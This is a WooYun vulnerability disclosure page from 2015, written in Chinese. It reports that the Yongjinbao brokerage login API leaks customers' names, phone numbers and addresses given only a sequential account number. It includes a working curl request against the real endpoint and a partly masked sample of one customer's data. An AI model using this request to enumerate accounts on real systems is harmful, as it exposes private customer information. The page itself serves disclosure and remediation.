当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108191

漏洞标题:国金证券佣金宝网站设计不当可导致客户敏感信息泄漏

相关厂商:佣金宝

漏洞作者: 路人甲

提交时间:2015-04-15 19:52

修复时间:2015-05-30 19:54

公开时间:2015-05-30 19:54

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:16

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

国金证券佣金宝网站业务办理系统可以在某些情况下无需密码验证即返回客户姓名、手机号、地址等敏感信息

详细说明:

漏洞地址:https://counter.yongjinbao.com.cn
输入任意佣金宝资金账号(几乎为连续数字),如40000000,输入任意密码(如123456)和任意验证码(可以是错误的),会提示登录异常。
但是浏览器所做的请求所对应的JSON接口返回的信息包括这个资金账号对应的个人敏感资料。
我已经提取出来了这个Ajax的JSON接口,经过测试,仅需要一个资金账号参数便可以获取所有信息。
可以直接使用cURL证明这个漏洞的存在:

curl "https://counter.yongjinbao.com.cn/ajaxUserLogin\!ajaxUserLogin.action" -H "X-Requested-With: XMLHttpRequest" -d "account_content=40000000"


结果为:(为保护他人隐私已将部分字符用X代替)

{"resMap":{"client_status":"0","errorInfo":"亲,您的密码格式不正确,请确认密码后重新输入","address":"西安市户县XX镇XX村XXX630号","client_type":0,"tel":"185XXXX2734","gender":"先生","client_id":"40000000","client_name":"杨永X","errorNo":-3,"mobile":"185XXXX2734"}}

漏洞证明:

11.png

修复方案:

不返回这些无用的敏感信息即可

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)